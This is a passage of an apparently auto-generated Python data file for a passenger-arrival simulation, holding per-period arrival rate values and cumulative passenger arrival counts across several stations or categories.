(10.72606825993309, 8.448916964658093, 11.361703047816906, 12.99488293561833, 12.968776807822776, 7.257796941777861, 6.809664942048866, 7.782239138911491, 13.95962058285218, 6.9614650283384565, 8.203154434992767, 9.796328772892876, 11.551739314998438), # 155
(10.637327353293314, 8.361234611710243, 11.298532183655539, 12.908919102893627, 12.892813332647707, 7.225581056931246, 6.74723555776578, 7.750525284055986, 13.907325442542877, 6.9082075819648825, 8.143420671591107, 9.729406117611353, 11.48249014823076), # 156
(10.546346402223609, 8.271053770900794, 11.233356708849547, 12.820315177724513, 12.81479388907716, 7.19216775715986, 6.6829013267775075, 7.717246530968915, 13.852971015334345, 6.853188482599679, 8.08166087688757, 9.660349050245092, 11.411319304324769), # 157
(10.450553324967336, 8.176634369081162, 11.163028735463298, 12.725677414311741, 12.731153548219398, 7.155434266843955, 6.615149409299001, 7.680115733289122, 13.792326928238738, 6.794712282807602, 8.01583405355452, 9.586639389872076, 11.335080203181485), # 158
(10.335201473769764, 8.06829144743927, 11.069432945764184, 12.605568022303835, 12.62126783369428, 7.103165507209945, 6.535497868740003, 7.626098945870136, 13.700998165711002, 6.723193391738244, 7.934383709866593, 9.493907533156353, 11.235598705688274), # 159
(10.198820932866035, 7.945135419957, 10.950689341138245, 12.458008514572404, 12.482988183885514, 7.034077814466758, 6.443141247737298, 7.553838865338286, 13.576395318120113, 6.637687912608051, 7.8361633120533565, 9.380702728442985, 11.110988852451014), # 160
(10.042510876420344, 7.8079692153126565, 10.808065760674433, 12.28440150525942, 12.317750373994958, 6.94900813819844, 6.338754024409627, 7.464240746353693, 13.420161673798626, 6.5389214704393135, 7.7220383164395905, 9.248074456470599, 10.962523662746737), # 161
(9.8673704785969, 7.657595762184535, 10.642830043461695, 12.086149608506858, 12.126990179224487, 6.848793427989039, 6.223010676875733, 7.358209843576484, 13.233940521079093, 6.427619690254325, 7.592874179350069, 9.09707219797781, 10.791476155852466), # 162
(9.674498913559898, 7.494817989250934, 10.456250028588983, 11.864655438456708, 11.912143374775964, 6.734270633422602, 6.096585683254362, 7.2366514116667755, 13.019375148294069, 6.304508197075376, 7.449536357109572, 8.928745433703247, 10.599119351045232), # 163
(9.464995355473539, 7.320438825190149, 10.249593555145248, 11.621321609250947, 11.674645735851264, 6.606276704083181, 5.960153521664253, 7.100470705284697, 12.778108843776113, 6.170312615924756, 7.292890306042875, 8.744143644385526, 10.386726267602059), # 164
(9.239958978502024, 7.135261198680485, 10.024128462219437, 11.357550735031554, 11.415933037652254, 6.465648589554821, 5.814388670224151, 6.950572979090365, 12.511784895857772, 6.02575857182476, 7.123801482474756, 8.544316310763268, 10.155569924799979), # 165
(9.000488956809557, 6.940088038400237, 9.7811225889005, 11.074745429940503, 11.137441055380801, 6.313223239421572, 5.659965607052801, 6.787863487743908, 12.222046592871603, 5.871571689797677, 6.943135342729992, 8.330312913575103, 9.906923341916015), # 166
(8.747684464560333, 6.735722273027703, 9.521843774277388, 10.774308308119782, 10.840605564238773, 6.149837603267482, 5.497558810268945, 6.613247485905448, 11.91053722315016, 5.7084775948658, 6.751757343133359, 8.103182933559642, 9.642059538227196), # 167
(8.482644675918554, 6.52296683124118, 9.247559857439049, 10.457641983711365, 10.526862339428039, 5.9763286306765995, 5.327842757991326, 6.427630228235103, 11.578900075025999, 5.5372019120514215, 6.550532940009634, 7.863975851455517, 9.362251533010546), # 168
(8.206468765048422, 6.302624641718972, 8.959538677474432, 10.126149070857236, 10.197647156150468, 5.793533271232973, 5.151491928338689, 6.231916969393004, 11.228778436831673, 5.358470266376831, 6.3403275896835956, 7.613741148001342, 9.0687723455431), # 169
(7.9202559061141375, 6.0754986331393726, 8.659048073472489, 9.781232183699368, 9.854395789607928, 5.60228847452065, 4.9691807994297745, 6.027012964039266, 10.861815596899735, 5.173008282864322, 6.122006748480023, 7.353528303935743, 8.762894995101878), # 170
(7.6251052732799005, 5.842391734180682, 8.34735588452217, 9.424293936379751, 9.498544015002288, 5.403431190123678, 4.781583849383328, 5.813823466834017, 10.47965484356274, 4.981541586536184, 5.896435872723688, 7.0843867999973416, 8.445892500963913), # 171
(7.322116040709912, 5.604106873521197, 8.025729949712423, 9.056736943040356, 9.131527607535416, 5.197798367626108, 4.5893755563180925, 5.593253732437379, 10.083939465153241, 4.784795802414712, 5.664480418739371, 6.80736611692476, 8.119037882406225), # 172
(7.012387382568372, 5.3614469798392195, 7.695438108132197, 8.679963817823166, 8.754782342409182, 4.9862269566119855, 4.39323039835281, 5.366209015509473, 9.676312750003792, 4.583496555522195, 5.427005842851849, 6.523515735456615, 7.783604158705848), # 173
(6.697018473019482, 5.115214981813045, 7.357748198870443, 8.295377174870158, 8.369743994825454, 4.76955390666536, 4.193822853606226, 5.133594570710425, 9.25841798644695, 4.3783694708809255, 5.1848776013858995, 6.233885136331535, 7.440864349139807), # 174
(6.377108486227438, 4.866213808120973, 7.013928061016112, 7.904379628323315, 7.977848339986097, 4.54861616737028, 3.9918274001970815, 4.896315652700355, 8.831898462815268, 4.170140173513194, 4.938961150666297, 5.939523800288141, 7.092091472985131), # 175
(6.053756596356447, 4.615246387441302, 6.66524553365815, 7.508373792324615, 7.580531153092983, 4.324250688310793, 3.787918516244121, 4.655277516139389, 8.3983974674413, 3.959534288441294, 4.690121947017822, 5.641481208065051, 6.738558549518844), # 176
(5.7280619775707065, 4.363115648452332, 6.3129684558855095, 7.108762281016037, 7.179228209347984, 4.097294419070949, 3.582770679866088, 4.411385415687646, 7.959558288657599, 3.7472774406875144, 4.43922544676525, 5.340806840400891, 6.381538598017975), # 177
(5.401123804034416, 4.11062451983236, 5.95836466678714, 6.7069477085395635, 6.775375283952959, 3.8685843092347962, 3.3770583691817246, 4.165544606005252, 7.51702421479672, 3.5340952552741505, 4.187137106233358, 5.038550178034279, 6.022304637759553), # 178
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 179
)
passenger_arriving_acc = (
(5, 5, 3, 0, 3, 4, 0, 2, 6, 1, 1, 1, 0, 4, 13, 6, 6, 10, 5, 4, 1, 1, 2, 0, 1, 0), # 0
(15, 15, 17, 5, 8, 7, 2, 6, 13, 3, 2, 2, 0, 13, 19, 11, 12, 17, 11, 5, 3, 3, 3, 0, 1, 0), # 1
(22, 22, 22, 15, 16, 10, 7, 6, 16, 3, 2, 3, 0, 20, 28, 17, 18, 24, 11, 8, 5, 5, 5, 0, 1, 0), # 2
(29, 27, 29, 22, 18, 18, 9, 7, 18, 4, 2, 4, 0, 29, 38, 23, 26, 30, 14, 10, 6, 6, 10, 0, 3, 0), # 3
(42, 31, 34, 35, 24, 24, 12, 12, 21, 6, 3, 5, 0, 39, 45, 30, 31, 38, 17, 12, 9, 12, 11, 0, 5, 0), # 4
(47, 37, 37, 45, 28, 27, 15, 14, 26, 10, 5, 6, 0, 48, 54, 39, 36, 47, 28, 16, 13, 15, 16, 0, 8, 0), # 5
(54, 49, 46, 55, 39, 29, 18, 20, 33, 10, 8, 6, 0, 60, 62, 49, 42, 54, 33, 21, 16, 20, 21, 1, 9, 0), # 6
(66, 59, 54, 65, 42, 35, 24, 23, 38, 11, 9, 8, 0, 73, 68, 56, 48, 66, 34, 23, 18, 26, 25, 3, 9, 0), # 7
(79, 68, 63, 77, 46, 37, 27, 23, 42, 11, 11, 9, 0, 82, 78, 68, 50, 79, 38, 27, 19, 29, 28, 4, 12, 0), # 8
(88, 79, 70, 87, 50, 40, 33, 29, 48, 14, 12, 9, 0, 93, 83, 79, 60, 87, 44, 33, 27, 36, 31, 5, 12, 0), # 9
(102, 87, 83, 96, 56, 44, 35, 35, 55, 15, 14, 10, 0, 107, 90, 85, 72, 93, 50, 35, 31, 40, 33, 6, 12, 0), # 10
(111, 94, 89, 107, 68, 46, 42, 37, 56, 16, 15, 11, 0, 116, 102, 93, 79, 103, 57, 41, 35, 49, 33, 6, 14, 0), # 11
(125, 104, 102, 121, 81, 52, 47, 46, 63, 16, 18, 12, 0, 128, 105, 100, 86, 120, 66, 43, 35, 52, 37, 8, 14, 0), # 12
(132, 116, 109, 129, 90, 56, 51, 51, 67, 19, 19, 14, 0, 138, 116, 108, 93, 132, 74, 49, 42, 55, 42, 9, 15, 0), # 13
(148, 127, 119, 141, 100, 62, 57, 53, 75, 20, 20, 15, 0, 157, 128, 116, 101, 140, 81, 55, 46, 59, 50, 11, 16, 0), # 14
(166, 144, 129, 152, 110, 66, 67, 56, 79, 23, 23, 16, 0, 166, 141, 126, 111, 146, 86, 62, 53, 60, 54, 15, 18, 0), # 15
(184, 159, 147, 166, 113, 70, 71, 64, 81, 27, 23, 17, 0, 182, 149, 137, 118, 155, 93, 72, 55, 64, 57, 20, 19, 0), # 16
(192, 173, 161, 177, 123, 72, 77, 67, 85, 27, 25, 18, 0, 192, 162, 149, 129, 168, 100, 80, 60, 69, 63, 22, 19, 0), # 17
(210, 184, 173, 190, 137, 76, 82, 71, 89, 28, 27, 18, 0, 204, 179, 160, 137, 177, 103, 86, 66, 72, 67, 24, 20, 0), # 18
(218, 197, 186, 199, 148, 82, 85, 80, 95, 30, 27, 20, 0, 219, 192, 164, 144, 185, 110, 88, 70, 75, 72, 27, 20, 0), # 19
(232, 220, 197, 211, 159, 84, 88, 83, 101, 37, 29, 22, 0, 229, 208, 180, 151, 199, 120, 93, 74, 79, 75, 29, 23, 0), # 20
(244, 236, 211, 223, 177, 90, 91, 89, 108, 41, 31, 22, 0, 241, 220, 184, 164, 207, 126, 100, 76, 84, 78, 29, 25, 0), # 21
(261, 249, 218, 235, 186, 95, 96, 89, 111, 44, 33, 23, 0, 258, 232, 197, 172, 220, 134, 108, 81, 89, 82, 32, 27, 0), # 22
(280, 263, 233, 249, 199, 100, 100, 97, 117, 45, 34, 28, 0, 275, 247, 205, 185, 231, 139, 116, 84, 95, 88, 33, 29, 0), # 23
(287, 278, 244, 264, 212, 101, 109, 104, 121, 50, 39, 29, 0, 292, 259, 216, 194, 242, 146, 119, 87, 101, 92, 33, 32, 0), # 24
(304, 291, 256, 278, 226, 106, 115, 108, 126, 53, 40, 30, 0, 313, 271, 227, 202, 248, 153, 126, 92, 106, 97, 38, 32, 0), # 25
(316, 310, 268, 296, 237, 109, 120, 117, 129, 55, 43, 31, 0, 334, 287, 240, 204, 259, 159, 134, 95, 109, 102, 41, 33, 0), # 26
(328, 322, 280, 308, 246, 115, 125, 125, 135, 57, 48, 31, 0, 355, 307, 252, 208, 271, 169, 141, 100, 114, 109, 44, 34, 0), # 27
(346, 335, 292, 319, 256, 125, 128, 131, 142, 59, 49, 34, 0, 374, 321, 268, 214, 286, 175, 147, 105, 119, 110, 49, 35, 0), # 28
(362, 347, 308, 335, 266, 126, 132, 133, 154, 62, 50, 35, 0, 386, 336, 279, 223, 299, 183, 153, 107, 125, 114, 51, 37, 0), # 29
(377, 364, 322, 347, 280, 133, 140, 142, 161, 64, 53, 35, 0, 400, 351, 292, 230, 311, 186, 153, 109, 128, 117, 53, 37, 0), # 30
(389, 374, 331, 351, 287, 136, 148, 148, 167, 68, 53, 36, 0, 413, 366, 299, 243, 324, 193, 158, 115, 134, 119, 56, 37, 0), # 31
(404, 384, 343, 365, 300, 144, 155, 154, 175, 73, 55, 36, 0, 429, 378, 311, 254, 335, 202, 163, 119, 139, 120, 57, 40, 0), # 32
(420, 396, 357, 377, 310, 150, 160, 161, 178, 74, 59, 37, 0, 442, 391, 320, 261, 350, 208, 170, 123, 143, 124, 58, 41, 0), # 33
(433, 415, 369, 389, 324, 153, 167, 166, 182, 75, 60, 37, 0, 458, 403, 333, 267, 356, 213, 178, 125, 145, 128, 62, 43, 0), # 34
(452, 426, 381, 398, 333, 157, 169, 170, 187, 76, 63, 39, 0, 466, 422, 340, 276, 370, 220, 184, 126, 153, 130, 65, 44, 0), # 35
(462, 440, 394, 412, 339, 163, 176, 176, 193, 78, 64, 40, 0, 476, 434, 346, 288, 380, 226, 187, 127, 155, 132, 67, 44, 0), # 36
(476, 458, 401, 427, 348, 168, 182, 182, 199, 80, 65, 42, 0, 486, 444, 355, 300, 388, 234, 191, 129, 162, 140, 70, 45, 0), # 37
(494, 472, 414, 450, 356, 171, 183, 188, 208, 81, 68, 44, 0, 499, 459, 371, 308, 403, 241, 197, 136, 171, 146, 75, 46, 0), # 38
(507, 492, 426, 466, 370, 177, 189, 190, 213, 84, 69, 44, 0, 510, 474, 381, 313, 413, 248, 200, 140, 173, 149, 76, 46, 0), # 39
(522, 503, 445, 484, 379, 185, 195, 195, 218, 89, 70, 46, 0, 520, 486, 389, 318, 420, 253, 207, 146, 184, 154, 78, 49, 0), # 40
(541, 513, 456, 499, 390, 193, 202, 199, 222, 94, 71, 48, 0, 531, 490, 395, 326, 433, 258, 212, 150, 191, 159, 82, 52, 0), # 41
(553, 528, 467, 515, 397, 201, 207, 203, 228, 97, 72, 50, 0, 548, 497, 404, 341, 446, 266, 221, 153, 198, 162, 82, 53, 0), # 42
(569, 535, 480, 529, 408, 206, 217, 208, 234, 97, 75, 52, 0, 563, 515, 409, 353, 459, 277, 231, 155, 208, 165, 85, 55, 0), # 43
(579, 544, 492, 536, 417, 215, 226, 215, 240, 101, 76, 53, 0, 574, 538, 421, 360, 471, 284, 237, 158, 218, 172, 87, 56, 0), # 44
(596, 560, 518, 543, 427, 217, 230, 220, 242, 102, 78, 54, 0, 587, 547, 427, 368, 481, 289, 241, 161, 222, 175, 89, 57, 0), # 45
(608, 574, 538, 555, 438, 222, 232, 226, 251, 107, 80, 54, 0, 604, 563, 440, 375, 498, 298, 243, 164, 227, 179, 89, 61, 0), # 46
(624, 594, 549, 571, 446, 229, 234, 234, 257, 110, 80, 55, 0, 618, 576, 452, 382, 510, 304, 249, 167, 228, 185, 93, 62, 0), # 47
(634, 607, 561, 589, 458, 236, 243, 240, 261, 113, 82, 56, 0, 642, 586, 458, 392, 520, 311, 252, 176, 233, 189, 94, 67, 0), # 48
(647, 617, 571, 602, 471, 243, 251, 245, 268, 115, 84, 56, 0, 659, 592, 467, 400, 531, 318, 261, 180, 241, 194, 96, 68, 0), # 49
(668, 626, 580, 616, 488, 246, 254, 249, 270, 117, 85, 58, 0, 678, 607, 479, 408, 540, 325, 264, 184, 246, 199, 97, 70, 0), # 50
(682, 640, 590, 633, 499, 251, 257, 257, 272, 121, 86, 58, 0, 688, 624, 492, 414, 551, 332, 270, 184, 251, 201, 98, 72, 0), # 51
(701, 656, 604, 642, 505, 258, 263, 259, 283, 123, 87, 59, 0, 697, 642, 506, 425, 556, 340, 275, 189, 259, 206, 98, 73, 0), # 52
(716, 671, 614, 655, 519, 261, 266, 263, 287, 124, 89, 59, 0, 709, 669, 518, 434, 568, 342, 277, 192, 263, 212, 103, 73, 0), # 53
(736, 685, 625, 662, 527, 266, 271, 266, 291, 129, 89, 60, 0, 717, 680, 526, 442, 577, 350, 281, 196, 266, 213, 104, 73, 0), # 54
(751, 697, 636, 671, 538, 272, 275, 274, 295, 132, 89, 60, 0, 735, 687, 537, 450, 590, 353, 286, 204, 272, 220, 106, 73, 0), # 55
(763, 713, 645, 680, 547, 277, 282, 278, 300, 133, 93, 62, 0, 752, 698, 548, 455, 602, 359, 288, 205, 279, 224, 108, 75, 0), # 56
(776, 729, 657, 687, 556, 286, 287, 279, 305, 137, 94, 63, 0, 766, 716, 559, 463, 614, 364, 296, 209, 281, 229, 112, 78, 0), # 57
(792, 745, 665, 706, 564, 287, 296, 281, 308, 141, 95, 67, 0, 776, 728, 565, 467, 633, 373, 305, 217, 285, 232, 114, 79, 0), # 58
(808, 756, 678, 718, 572, 292, 301, 287, 313, 142, 95, 68, 0, 790, 741, 580, 474, 647, 378, 311, 221, 287, 236, 116, 81, 0), # 59
(820, 770, 686, 732, 580, 301, 305, 292, 322, 142, 98, 69, 0, 815, 750, 591, 481, 655, 383, 317, 222, 292, 239, 117, 82, 0), # 60
(837, 785, 696, 741, 590, 307, 309, 295, 328, 146, 100, 71, 0, 823, 762, 598, 485, 665, 390, 321, 224, 296, 242, 121, 85, 0), # 61
(851, 798, 703, 755, 594, 310, 314, 300, 333, 149, 101, 72, 0, 841, 771, 608, 494, 675, 396, 327, 226, 299, 246, 125, 85, 0), # 62
(861, 816, 709, 765, 601, 313, 321, 303, 338, 153, 103, 73, 0, 847, 787, 615, 500, 686, 399, 333, 227, 304, 253, 128, 86, 0), # 63
(877, 831, 720, 780, 614, 317, 324, 306, 346, 156, 105, 74, 0, 862, 799, 623, 504, 695, 406, 342, 231, 311, 256, 128, 87, 0), # 64
(891, 847, 731, 789, 627, 321, 328, 313, 350, 162, 106, 75, 0, 873, 813, 631, 509, 710, 411, 345, 237, 316, 264, 133, 88, 0), # 65
(903, 858, 744, 804, 634, 325, 335, 313, 356, 167, 108, 75, 0, 884, 837, 644, 511, 718, 415, 351, 242, 319, 272, 135, 88, 0), # 66
(918, 873, 757, 817, 650, 330, 337, 320, 357, 171, 113, 77, 0, 894, 850, 660, 520, 731, 421, 355, 250, 324, 278, 140, 89, 0), # 67
(932, 882, 772, 826, 665, 338, 342, 326, 359, 171, 117, 78, 0, 900, 860, 668, 526, 739, 429, 361, 253, 328, 284, 141, 90, 0), # 68
(947, 893, 783, 842, 675, 341, 348, 329, 364, 176, 119, 78, 0, 916, 872, 677, 533, 756, 436, 364, 257, 330, 291, 141, 90, 0), # 69
(957, 903, 797, 855, 688, 345, 357, 335, 369, 178, 124, 79, 0, 933, 887, 683, 546, 764, 446, 368, 259, 335, 296, 142, 90, 0), # 70
(970, 915, 807, 877, 705, 353, 362, 338, 374, 181, 126, 83, 0, 947, 899, 693, 551, 776, 451, 377, 263, 339, 300, 146, 93, 0), # 71
(986, 926, 817, 890, 719, 359, 366, 345, 382, 183, 126, 83, 0, 960, 913, 708, 559, 789, 459, 380, 265, 345, 304, 149, 95, 0), # 72
(1000, 940, 826, 901, 730, 362, 368, 351, 386, 186, 127, 83, 0, 976, 928, 716, 569, 800, 466, 385, 266, 355, 306, 151, 96, 0), # 73
(1016, 948, 834, 907, 735, 370, 374, 354, 390, 187, 130, 85, 0, 993, 942, 720, 577, 812, 475, 390, 271, 361, 309, 152, 99, 0), # 74
(1029, 971, 842, 921, 744, 375, 377, 357, 400, 189, 132, 86, 0, 1014, 953, 730, 594, 820, 483, 397, 275, 369, 312, 157, 100, 0), # 75
(1043, 987, 849, 932, 759, 384, 381, 362, 406, 192, 133, 87, 0, 1024, 964, 739, 597, 830, 485, 402, 284, 374, 316, 160, 101, 0), # 76
(1053, 1003, 858, 949, 774, 388, 386, 371, 416, 195, 134, 89, 0, 1039, 980, 749, 605, 840, 491, 408, 288, 375, 321, 162, 102, 0), # 77
(1066, 1011, 871, 969, 781, 395, 395, 372, 421, 197, 138, 89, 0, 1049, 994, 754, 613, 848, 494, 412, 291, 377, 326, 164, 103, 0), # 78
(1085, 1022, 884, 980, 790, 398, 405, 374, 425, 199, 140, 92, 0, 1073, 1010, 766, 620, 859, 506, 417, 294, 383, 332, 166, 105, 0), # 79
(1103, 1039, 894, 986, 797, 402, 409, 382, 429, 200, 142, 93, 0, 1087, 1022, 778, 628, 869, 510, 423, 301, 389, 337, 170, 106, 0), # 80
(1113, 1052, 904, 994, 804, 406, 414, 385, 432, 204, 142, 93, 0, 1099, 1028, 787, 638, 885, 516, 429, 307, 397, 345, 174, 106, 0), # 81
(1129, 1067, 910, 1004, 811, 407, 420, 389, 440, 206, 142, 93, 0, 1117, 1040, 791, 642, 896, 518, 436, 310, 403, 351, 178, 106, 0), # 82
(1139, 1077, 922, 1008, 821, 410, 424, 394, 448, 209, 142, 95, 0, 1129, 1053, 800, 647, 916, 520, 440, 314, 407, 358, 179, 107, 0), # 83
(1151, 1093, 935, 1017, 834, 414, 429, 398, 450, 211, 143, 95, 0, 1144, 1066, 815, 653, 926, 526, 447, 316, 412, 362, 182, 110, 0), # 84
(1161, 1102, 950, 1034, 843, 417, 435, 403, 455, 212, 144, 95, 0, 1157, 1077, 828, 658, 939, 537, 454, 323, 414, 363, 183, 111, 0), # 85
(1179, 1113, 959, 1045, 848, 423, 441, 405, 460, 215, 147, 96, 0, 1169, 1092, 836, 661, 949, 542, 457, 329, 419, 366, 184, 111, 0), # 86
(1190, 1119, 973, 1056, 862, 428, 445, 412, 465, 217, 151, 97, 0, 1188, 1107, 843, 666, 960, 548, 461, 329, 428, 370, 186, 113, 0), # 87
(1202, 1125, 985, 1065, 876, 432, 452, 418, 469, 220, 154, 97, 0, 1200, 1121, 847, 677, 973, 556, 464, 336, 435, 372, 188, 113, 0), # 88
(1220, 1135, 998, 1078, 888, 441, 458, 421, 479, 225, 155, 97, 0, 1217, 1129, 855, 686, 987, 558, 468, 338, 443, 374, 193, 114, 0), # 89
(1235, 1142, 1009, 1085, 903, 446, 465, 426, 485, 228, 157, 97, 0, 1227, 1144, 864, 697, 999, 561, 473, 343, 449, 374, 193, 117, 0), # 90
(1247, 1153, 1023, 1096, 918, 449, 472, 433, 489, 230, 158, 98, 0, 1240, 1153, 876, 700, 1003, 569, 479, 347, 452, 383, 197, 117, 0), # 91
(1266, 1165, 1035, 1110, 926, 456, 475, 437, 490, 231, 163, 99, 0, 1259, 1163, 884, 704, 1010, 575, 484, 351, 456, 384, 199, 117, 0), # 92
(1280, 1171, 1050, 1127, 934, 467, 478, 445, 498, 232, 164, 100, 0, 1266, 1179, 897, 711, 1018, 581, 485, 358, 460, 385, 201, 119, 0), # 93
(1295, 1185, 1063, 1144, 940, 469, 481, 449, 507, 234, 166, 103, 0, 1277, 1194, 906, 713, 1037, 584, 490, 361, 465, 389, 202, 119, 0), # 94
(1315, 1199, 1072, 1157, 950, 471, 489, 452, 511, 234, 168, 104, 0, 1294, 1204, 921, 716, 1044, 592, 491, 365, 476, 393, 202, 121, 0), # 95
(1328, 1209, 1088, 1167, 962, 475, 494, 453, 513, 236, 171, 105, 0, 1306, 1216, 931, 720, 1053, 598, 493, 365, 482, 395, 202, 121, 0), # 96
(1340, 1219, 1100, 1179, 972, 479, 497, 455, 516, 239, 173, 105, 0, 1315, 1225, 941, 730, 1063, 602, 502, 369, 490, 399, 206, 123, 0), # 97
(1353, 1231, 1107, 1191, 982, 480, 500, 459, 526, 239, 173, 108, 0, 1326, 1237, 953, 732, 1077, 609, 504, 369, 494, 406, 210, 126, 0), # 98
(1370, 1242, 1119, 1202, 991, 485, 503, 463, 528, 240, 174, 110, 0, 1340, 1247, 964, 737, 1089, 614, 506, 374, 497, 410, 212, 128, 0), # 99
(1385, 1260, 1134, 1218, 1000, 487, 507, 471, 534, 244, 179, 111, 0, 1357, 1258, 973, 743, 1094, 618, 512, 381, 500, 412, 216, 129, 0), # 100
(1395, 1273, 1150, 1232, 1009, 493, 515, 473, 543, 247, 179, 111, 0, 1374, 1270, 979, 746, 1109, 623, 518, 383, 504, 422, 218, 131, 0), # 101
(1409, 1285, 1159, 1242, 1021, 499, 522, 476, 547, 249, 181, 111, 0, 1387, 1280, 981, 752, 1117, 628, 523, 386, 507, 422, 219, 132, 0), # 102
(1425, 1292, 1165, 1253, 1033, 509, 529, 481, 555, 255, 181, 111, 0, 1403, 1289, 988, 757, 1123, 635, 526, 388, 511, 431, 220, 133, 0), # 103
(1440, 1300, 1178, 1264, 1047, 511, 532, 486, 561, 258, 185, 115, 0, 1411, 1305, 994, 766, 1132, 641, 529, 390, 522, 435, 224, 134, 0), # 104
(1452, 1315, 1185, 1277, 1057, 515, 539, 486, 568, 260, 187, 115, 0, 1425, 1312, 1002, 772, 1144, 649, 534, 393, 530, 440, 227, 136, 0), # 105
(1466, 1323, 1195, 1286, 1065, 518, 543, 492, 573, 264, 192, 117, 0, 1445, 1320, 1016, 777, 1155, 656, 538, 401, 542, 444, 229, 136, 0), # 106
(1481, 1332, 1212, 1304, 1075, 521, 550, 496, 579, 266, 197, 119, 0, 1456, 1333, 1024, 782, 1169, 662, 541, 405, 549, 450, 230, 136, 0), # 107
(1492, 1342, 1218, 1316, 1087, 526, 551, 499, 585, 266, 202, 122, 0, 1477, 1340, 1031, 794, 1179, 665, 547, 408, 561, 453, 230, 137, 0), # 108
(1505, 1350, 1226, 1322, 1099, 531, 554, 504, 590, 266, 202, 122, 0, 1494, 1350, 1042, 799, 1189, 668, 551, 412, 564, 457, 232, 137, 0), # 109
(1524, 1361, 1234, 1342, 1109, 538, 558, 508, 595, 270, 203, 122, 0, 1507, 1359, 1047, 801, 1199, 672, 558, 416, 570, 458, 234, 138, 0), # 110
(1531, 1375, 1245, 1354, 1120, 541, 565, 512, 602, 271, 204, 124, 0, 1515, 1366, 1054, 809, 1209, 674, 563, 418, 576, 461, 235, 140, 0), # 111
(1553, 1389, 1252, 1362, 1130, 545, 569, 513, 609, 274, 204, 127, 0, 1530, 1381, 1061, 814, 1221, 679, 568, 426, 579, 463, 238, 140, 0), # 112
(1557, 1398, 1268, 1371, 1144, 547, 571, 517, 614, 277, 206, 127, 0, 1548, 1385, 1068, 819, 1237, 684, 574, 433, 587, 466, 241, 142, 0), # 113
(1575, 1404, 1281, 1378, 1149, 552, 576, 521, 620, 278, 207, 127, 0, 1557, 1394, 1078, 829, 1251, 688, 579, 433, 589, 470, 242, 144, 0), # 114
(1595, 1413, 1290, 1393, 1161, 558, 578, 521, 623, 283, 209, 127, 0, 1573, 1408, 1083, 836, 1259, 693, 587, 435, 592, 471, 245, 145, 0), # 115
(1609, 1423, 1309, 1398, 1173, 566, 582, 527, 626, 286, 210, 129, 0, 1583, 1413, 1092, 842, 1265, 696, 592, 437, 597, 477, 247, 145, 0), # 116
(1618, 1438, 1324, 1410, 1183, 576, 584, 534, 634, 287, 211, 130, 0, 1602, 1422, 1103, 853, 1275, 703, 593, 438, 601, 484, 249, 146, 0), # 117
(1633, 1452, 1335, 1419, 1194, 577, 587, 538, 645, 289, 212, 132, 0, 1610, 1432, 1111, 859, 1290, 706, 597, 441, 610, 485, 250, 147, 0), # 118
(1647, 1464, 1346, 1430, 1206, 584, 591, 543, 646, 292, 213, 134, 0, 1628, 1439, 1122, 869, 1300, 716, 600, 444, 614, 490, 252, 147, 0), # 119
(1659, 1476, 1357, 1445, 1218, 586, 596, 545, 652, 292, 216, 136, 0, 1641, 1447, 1129, 875, 1311, 722, 602, 451, 618, 492, 254, 147, 0), # 120
(1673, 1486, 1374, 1458, 1225, 589, 600, 550, 654, 296, 216, 138, 0, 1656, 1457, 1137, 881, 1318, 728, 609, 453, 619, 494, 256, 147, 0), # 121
(1691, 1496, 1384, 1473, 1232, 595, 608, 552, 659, 299, 220, 140, 0, 1668, 1470, 1143, 886, 1327, 736, 614, 459, 627, 497, 259, 147, 0), # 122
(1704, 1506, 1401, 1481, 1238, 600, 611, 558, 664, 299, 225, 140, 0, 1682, 1480, 1150, 892, 1338, 736, 616, 461, 631, 501, 260, 148, 0), # 123
(1716, 1518, 1409, 1495, 1247, 606, 615, 560, 665, 299, 227, 140, 0, 1694, 1490, 1157, 900, 1346, 739, 623, 465, 639, 506, 261, 148, 0), # 124
(1727, 1523, 1416, 1513, 1260, 609, 622, 562, 667, 300, 227, 140, 0, 1705, 1499, 1166, 904, 1350, 745, 629, 469, 643, 508, 263, 149, 0), # 125
(1741, 1530, 1425, 1530, 1269, 615, 624, 563, 671, 300, 227, 142, 0, 1722, 1508, 1172, 908, 1364, 750, 633, 470, 644, 512, 265, 149, 0), # 126
(1751, 1539, 1432, 1537, 1278, 615, 628, 566, 677, 301, 228, 142, 0, 1737, 1520, 1182, 911, 1369, 752, 641, 472, 651, 514, 268, 149, 0), # 127
(1761, 1552, 1444, 1548, 1286, 623, 632, 568, 683, 302, 229, 143, 0, 1747, 1530, 1190, 915, 1377, 755, 643, 476, 656, 517, 270, 151, 0), # 128
(1767, 1561, 1464, 1562, 1298, 626, 637, 574, 686, 302, 230, 145, 0, 1762, 1538, 1197, 920, 1382, 758, 649, 483, 659, 521, 272, 151, 0), # 129
(1782, 1566, 1474, 1572, 1307, 628, 643, 576, 691, 307, 230, 146, 0, 1774, 1547, 1206, 926, 1389, 762, 650, 488, 661, 525, 273, 152, 0), # 130
(1793, 1570, 1485, 1578, 1315, 632, 648, 577, 692, 309, 231, 148, 0, 1785, 1555, 1211, 929, 1394, 770, 657, 490, 668, 529, 275, 153, 0), # 131
(1798, 1579, 1494, 1582, 1325, 637, 651, 580, 698, 309, 234, 151, 0, 1796, 1567, 1216, 937, 1399, 779, 663, 493, 676, 533, 276, 154, 0), # 132
(1809, 1597, 1504, 1594, 1333, 641, 653, 585, 701, 312, 237, 151, 0, 1806, 1578, 1225, 943, 1407, 785, 666, 499, 680, 536, 277, 155, 0), # 133
(1822, 1607, 1514, 1600, 1342, 649, 657, 590, 705, 312, 240, 152, 0, 1822, 1588, 1231, 949, 1424, 787, 671, 503, 688, 543, 279, 155, 0), # 134
(1837, 1619, 1526, 1609, 1352, 653, 663, 592, 707, 312, 243, 152, 0, 1834, 1595, 1241, 953, 1433, 795, 676, 505, 692, 547, 287, 157, 0), # 135
(1848, 1631, 1534, 1625, 1360, 655, 666, 598, 712, 314, 244, 153, 0, 1845, 1604, 1248, 960, 1437, 802, 678, 511, 701, 551, 288, 157, 0), # 136
(1860, 1634, 1548, 1632, 1370, 660, 670, 601, 717, 315, 246, 155, 0, 1858, 1608, 1252, 966, 1443, 806, 683, 512, 708, 556, 290, 157, 0), # 137
(1874, 1646, 1558, 1646, 1383, 663, 676, 605, 721, 321, 248, 155, 0, 1869, 1616, 1261, 974, 1452, 809, 685, 516, 712, 559, 291, 157, 0), # 138
(1884, 1656, 1567, 1662, 1399, 667, 677, 610, 726, 321, 249, 155, 0, 1881, 1628, 1268, 977, 1460, 817, 689, 517, 717, 561, 294, 158, 0), # 139
